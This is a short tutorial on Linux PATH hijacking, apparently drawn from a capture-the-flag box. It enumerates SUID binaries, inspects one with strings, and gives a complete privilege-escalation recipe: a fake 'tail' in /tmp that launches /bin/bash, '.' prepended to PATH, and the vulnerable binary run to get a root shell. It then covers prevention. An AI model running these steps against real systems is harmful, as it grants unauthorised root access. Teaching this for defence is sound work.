How to avoid Path hijacking attack

Path hijacking is a type of attack where an attacker places a malicious executable in a location that is searched before the legitimate executable. This guide will show you how to identify vulnerabilities and protect against path hijacking attacks.

Enumerate the SUID permission

Files with the SUID (Set User ID) permission can be exploited if not managed properly. Use the following commands to find files with SUID and SGID (Set Group ID) permissions:

 # Find files with SUID permission 
find / -perm -u=s -type f 2>/dev/null 

 # Find files with SGID permission 
find / -perm -g=s -type f 2>/dev/null

You can also use enumeration scripts like LSE.sh for a more comprehensive scan: https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

Identify SUID Vulnerabilities

Check directories and files for SUID permissions. For example, listing the contents of a user's home directory:

ls -la /home/joe/

Output:

barry@mustacchio:~$ ls -la /home/joe/
total 28
drwxr-xr-x 2 joe joe 4096 Jun 12 15:48 .
drwxr-xr-x 4 root root 4096 Jun 12 15:48 ..
-rwsr-xr-x 1 root root 16832 Jun 12 15:48 live_log

In this example, live_log has the SUID permission set, indicating a potential vulnerability.

Search Inside Binary Files

When dealing with binary files, use strings to extract and analyze readable text. This can help identify what commands or programs the binary calls:

strings /home/joe/live_log

Output:

The output shows that the live_log program uses tail.

Perform a Hijacking Attack

To perform a path hijacking attack, create a fake executable in a directory that is searched before the legitimate executable. Here’s how: Create a file named tail in /tmp containing /bin/bash.

cd /tmp  
echo "/bin/bash" > tail  
chmod +x tail

Modify the PATH environment variable to include the current directory (.) before the system paths:

PATH=.:$PATH  

Execute the vulnerable program:

/home/joe/live_log

If the program runs the malicious tail script, you will gain root access.

Preventing Path Hijacking Attacks

To prevent path hijacking attacks, avoid relying on the PATH environment variable to locate executables in scripts or binaries. Instead, use absolute paths. For example:

 # Instead of using just the command
tail /var/log/syslog

 # Use the absolute path to the command
/usr/bin/tail /var/log/syslog

Additional Security Practices

• Restrict SUID/SGID Binaries: Limit the use of SUID and SGID binaries to only those absolutely necessary.
• Environment Sanitization: Ensure that sensitive scripts and binaries sanitize the environment variables before execution.
• System Audits: Regularly audit your system for unexpected SUID/SGID binaries and unusual environment variable settings.